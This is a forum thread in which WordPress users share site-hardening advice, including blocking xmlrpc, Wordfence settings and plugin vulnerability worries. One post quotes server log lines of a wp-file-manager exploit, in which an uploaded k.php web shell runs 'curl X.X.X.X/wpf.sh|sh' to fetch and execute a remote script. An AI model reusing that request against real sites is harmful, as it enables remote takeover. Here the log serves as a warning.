Please Help!! I lost hope in WordPress!

MrSam_1

MrSam_1

Well-known member
Administrative
Trusted Seller
Dec 1, 2018
23,613
26,955
120
in wordfence add restricted request for login this [login]
This way you will get rid of at least half of xmlrpc login scanners. Or completely block xmlrpc if you don't use third party apps.
 
  • Like
  • Love
Reactions: Eddie147, smalok, underwater and 2 others
KarmaticOne

KarmaticOne

Active member
Trusted Uploader
Mar 13, 2019
219
134
43
5th Dimension
themadoxter said:
I don't even know the duplicator pro was used for this (hacking) but yes, i'm using wordfence, loginizer, 2 step login, virus total, google recaptcha and i change my admin url, daily backups, lock anyone who try to use "admin" word and variations and so on.
Click to expand...

Brilliantly done sir.

With nearly 40% of all websites on the internet now being powered by WordPress, coupled with the fact that Covid lockdowns are keeping people at home, it's becoming increasingly necessary for web designers to develop a better understanding of website security or, at the very least, adopt best practices as you have done.

Thanks for sharing!
 
  • Love
  • Like
Reactions: Eddie147, Fat_Thor and Mr G
GodDevil

GodDevil

Member
Oct 9, 2019
78
27
18
themadoxter said:
I don't even know the duplicator pro was used for this (hacking) but yes, i'm using wordfence, loginizer, 2 step login, virus total, google recaptcha and i change my admin url, daily backups, lock anyone who try to use "admin" word and variations and so on.
Click to expand...
Duplicator pro is vulnerable to hacking? OMG...many people suggest this plugin. However, I use Updraftplus. Hope Updraftplus is better.
 
  • Like
Reactions: Eddie147
themadoxter

themadoxter

Member
Oct 24, 2020
53
25
18
KarmaticOne said:
Brilliantly done sir.

With nearly 40% of all websites on the internet now being powered by WordPress, coupled with the fact that Covid lockdowns are keeping people at home, it's becoming increasingly necessary for web designers to develop a better understanding of website security or, at the very least, adopt best practices as you have done.

Thanks for sharing!
Click to expand...
You're so polite, Babiato needs a "MVM" member badge. (most valuable member)
 
  • Love
  • Like
Reactions: Eddie147 and KarmaticOne
MrSam_1

MrSam_1

Well-known member
Administrative
Trusted Seller
Dec 1, 2018
23,613
26,955
120
Scorp said:
What do you all think about file manager plugin in wordpress? Which let us edit any file from wordpress rather than accessing cpanel and editing it.
Click to expand...

Let me answer to this in some less common way:

Code: 
[19/Dec/2020:08:57:08 +0000] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 1453 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
[19/Dec/2020:08:57:48 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/k.php?cmd=curl+X.X.X.X%2Fwpf.sh%7Csh HTTP/1.1" 200 411

I personally don't trust that plugin as it had critical flaws in the last major releases
 
  • Like
  • Love
Reactions: smalok, Scorp and KarmaticOne
KarmaticOne

KarmaticOne

Active member
Trusted Uploader
Mar 13, 2019
219
134
43
5th Dimension
slvrsteele said:
in wordfence add restricted request for login this [login]
This way you will get rid of at least half of xmlrpc login scanners. Or completely block xmlrpc if you don't use third party apps.
Click to expand...

This is sooo important it should almost be pinned. I completely block xmlrpc. Thank you for pointing this simple yet crucial step.
 
  • Like
Reactions: Eddie147 and smalok
🅰🅳🅸🆃🆈🅰

🅰🅳🅸🆃🆈🅰

Active member
Mar 20, 2020
199
122
43
पृथ्वीलोक :
KarmaticOne said:
Brilliantly done sir.

With nearly 40% of all websites on the internet now being powered by WordPress, coupled with the fact that Covid lockdowns are keeping people at home, it's becoming increasingly necessary for web designers to develop a better understanding of website security or, at the very least, adopt best practices as you have done.

Thanks for sharing!
Click to expand...
Changing wp admin url is more likely to he hack says wordfence
 
I

imraxstar

Active member
Oct 27, 2020
231
116
43
yes, there is a news comes from wordfence recently which says elementor free version has some problem and it affected 7M website worldwide, maybe this is what you are facing. Check wordfence blog for this and immediately either remove elementor oor update it. Elementor causing this issue maybe. Check it
 
frizzel

frizzel

Well-known member
Trusted Uploader
Jun 13, 2019
485
253
63
Wherever my imagination takes me
imraxstar said:
yes, there is a news comes from wordfence recently which says elementor free version has some problem and it affected 7M website worldwide, maybe this is what you are facing. Check wordfence blog for this and immediately either remove elementor oor update it. Elementor causing this issue maybe. Check it
Click to expand...
Since he says all of his websites are affected, I doubt it's Elementor, cause the vulnerability only exists when people have access to the editor. From the Wordfence blog (comments section):

"this can only be exploited by users that can access the Elementor editor. If the only users on the site are those that are already allowed to add unfiltered HTML or JavaScript, such as administrators or editors, then yes, this doesn't add any additional risk. The primary risk is for sites that have users with fewer privileges, such as contributors and authors, as this creates a larger attack surface."

Still, given the huge user base of Elementor, it's a big thing...
 
  • Like
Reactions: KarmaticOne and Eddie147
underwater

underwater

Active member
Nov 26, 2020
256
63
28
slvrsteele said:
in wordfence add restricted request for login this [login]
This way you will get rid of at least half of xmlrpc login scanners. Or completely block xmlrpc if you don't use third party apps.
Click to expand...
Hi @slvrsteele , could you please explain the real steps to do what you suggest in simple language. I feel that your tip is important but I do not understand how to really apply it. Thank you in advance.
 
Eddie147

Eddie147

Member
Jan 25, 2020
71
18
8
KarmaticOne said:
Brilliantly done sir.

With nearly 40% of all websites on the internet now being powered by WordPress, coupled with the fact that Covid lockdowns are keeping people at home, it's becoming increasingly necessary for web designers to develop a better understanding of website security or, at the very least, adopt best practices as you have done.

Thanks for sharing!
Click to expand...
That's true
 
You must log in or register to reply here.

Similar threads

RickGrimes22
Hi Geeks, I Need help with DirectAdmin. Please help!
Replies
0
Views
289
General Discussion
RickGrimes22
RickGrimes22
xCelestialx
Please help me, Relevanssi dont show polylang results.
Replies
0
Views
325
General Discussion
xCelestialx
xCelestialx
K
Please 🙏 Help me with recommendations
Replies
17
Views
964
General Discussion
Koco
K
omero2013
ad blocker for website. Please help!!
Replies
4
Views
544
General Discussion
lewstergroup
lewstergroup
salem0
Please help!
Replies
5
Views
664
General Discussion
salem0
salem0

Latest posts

Forum statistics

Threads
69,219
Messages
908,375
Members
236,910
Latest member
bahaa.adel005

Share this page

Share this page

About us

  • Our community has been around for many years and pride ourselves on offering unbiased, critical discussion among people of all different backgrounds. We are working every day to make sure our community is one of the best.

Quick Navigation

Forums Contact us

User Menu

Login
Community platform by XenForo © 2010-2022 XenForo Ltd.
Top Bottom